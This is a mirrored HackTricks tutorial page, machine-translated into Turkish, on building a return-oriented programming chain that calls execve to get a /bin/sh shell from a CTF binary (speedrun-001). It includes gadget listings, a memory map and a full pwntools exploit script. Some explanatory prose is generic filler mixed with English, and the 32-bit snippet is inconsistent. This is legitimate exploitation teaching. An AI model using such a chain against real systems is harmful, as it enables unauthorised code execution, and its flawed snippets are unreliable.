Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
Translator workflow 6cb783ece2 Translated to Turkish
2024-02-10 18:14:16 +00:00

10 KiB
Raw Blame History

ROP - sys_execve çağrısı

AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'i desteklemenin diğer yolları:

Syscall için çağrıyı hazırlamak için aşağıdaki yapılandırmaya ihtiyaç vardır:

  • rax: 59 sys_execve'yi belirtir
  • rdi: "/bin/sh" dosyasını belirtir
  • rsi: 0 argüman geçirilmediğini belirtir
  • rdx: 0 çevre değişkeni geçirilmediğini belirtir

Yani, temel olarak /bin/sh dizesini bir yere yazmak ve ardından syscall işlemini gerçekleştirmek gerekmektedir (yığını kontrol etmek için gereken dolgu hakkında bilinçli olunmalıdır).

Registerları kontrol etmek

Başlayalım ve bu registerları nasıl kontrol edeceğimizi bulalım:

ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret

Bu adreslerle, içeriği yığında yazmak ve kaydetmek mümkündür.

Dize yazma

Yazılabilir bellek

Öncelikle, bellekte yazılabilir bir yer bulmanız gerekmektedir.

gef> vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]

Dize Yaz

Ardından, bu adrese isteğe bağlı içerik yazmak için bir yol bulmanız gerekmektedir.

ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx

32 bitlik sistemler

32 bitlik sistemlerde, ROP (Return Oriented Programming) kullanarak execve sistem çağrısını gerçekleştirebiliriz. Bu, hedef sistemde yeni bir işlem başlatmamızı sağlar.

execve sistem çağrısı, bir programı çalıştırmak için kullanılır. İşletim sistemi, belirtilen programı hedef sistemde çalıştırır. Bu sistem çağrısı, execve(const char *filename, char *const argv[], char *const envp[]) şeklinde tanımlanır.

ROP kullanarak execve sistem çağrısını gerçekleştirmek için aşağıdaki adımları izleyebiliriz:

  1. İşletim sistemi tarafından sağlanan execve sistem çağrısının adresini bulun.
  2. execve sistem çağrısını gerçekleştirecek olan argümanları hazırlayın.
  3. ROP zinciri oluşturun ve execve sistem çağrısını tetikleyin.

Bu yöntem, hedef sistemde yeni bir işlem başlatmak için kullanılabilir. Ancak, hedef sistemdeki güvenlik önlemleri ve sistem yapılandırması bu yöntemin etkinliğini etkileyebilir.

'''
Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''

rop += popRdx           # place value into EAX
rop += "/bin"           # 4 bytes at a time
rop += popRax           # place value into edx
rop += p32(0x6b6000)    # Writable memory
rop += writeGadget   #Address to: mov qword ptr [rax], rdx

rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget

64 bit

64 bit işletim sistemleri, 64 bitlik bellek adresleme yeteneğine sahip olan işletim sistemleridir. Bu sistemler, daha büyük bellek alanlarına erişim sağlayabilir ve daha karmaşık hesaplama işlemlerini gerçekleştirebilir. 64 bitlik işletim sistemlerinde, bellek adresleri 64 bitlik sayılarla temsil edilir.

ROP (Return-Oriented Programming)

ROP (Return-Oriented Programming), hedef bir programda bulunan mevcut kod parçalarını kullanarak istenilen işlemleri gerçekleştirmek için kullanılan bir saldırı tekniğidir. Bu teknik, hedef programın belleğindeki mevcut kod parçalarını birleştirerek yeni bir işlem dizisi oluşturur. Bu işlem dizisi, hedef programın çalışma akışını değiştirerek istenilen işlemleri gerçekleştirir.

Syscall

Syscall (System Call), bir işletim sistemi hizmetine erişmek için kullanılan bir arayüzdür. Bir program, işletim sistemi hizmetlerine erişmek için syscall komutunu kullanır. Syscall komutu, işletim sistemiyle iletişim kurarak belirli bir hizmeti gerçekleştirir. Örneğin, dosya okuma veya yazma gibi işlemler için syscall komutu kullanılır.

execv()

execv() fonksiyonu, bir programın başka bir programı çalıştırmasını sağlayan bir C dilindeki işlevdir. Bu fonksiyon, bir programın belleğindeki mevcut kod parçalarını kullanarak başka bir programı çalıştırır. execv() fonksiyonu, hedef programın çalıştırılabilir dosyasının yolunu ve argümanlarını alır ve hedef programı çalıştırır.

'''
Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx

Örnek

Let's consider a simple example to understand how to use ROP to execute a execve syscall in Linux.

Linux systems use the execve syscall to execute a new program. This syscall takes three arguments: the path to the program, an array of command-line arguments, and an array of environment variables.

To execute a execve syscall using ROP, we need to find the addresses of the necessary gadgets and the addresses of the strings we want to pass as arguments.

First, we need to find a gadget that will load the address of the execve syscall into a register. We can use the pop rax; ret gadget to load the syscall number into the rax register.

Next, we need to find gadgets that will load the arguments for the execve syscall into the appropriate registers. We can use gadgets like pop rdi; ret to load the path to the program into the rdi register, pop rsi; ret to load the address of the command-line arguments array into the rsi register, and pop rdx; ret to load the address of the environment variables array into the rdx register.

Finally, we need to find a gadget that will trigger the execve syscall. We can use the syscall; ret gadget to trigger the syscall.

Once we have the addresses of these gadgets and the addresses of the strings we want to pass as arguments, we can construct our ROP chain. The ROP chain will consist of the addresses of the gadgets followed by the addresses of the strings.

When the ROP chain is executed, it will load the necessary values into the appropriate registers and trigger the execve syscall, executing the specified program with the specified arguments and environment variables.

This is just a basic example of how to use ROP to execute a execve syscall in Linux. ROP can be used for much more complex tasks, such as bypassing security mechanisms or escalating privileges.

from pwn import *

target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')

# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)

# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)

# Our syscall gadget
syscall = p64(0x40129c)

'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget

'''
Prep the four registers with their arguments, and make the syscall

pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0

syscall
'''

rop += popRax
rop += p64(0x3b)

rop += popRdi
rop += p64(0x6b6000)

rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)

rop += syscall


# Add the padding to the saved return address
payload = "0"*0x408 + rop

# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)

target.interactive()

Referanslar

AWS hackleme konusunda sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!

HackTricks'i desteklemenin diğer yolları: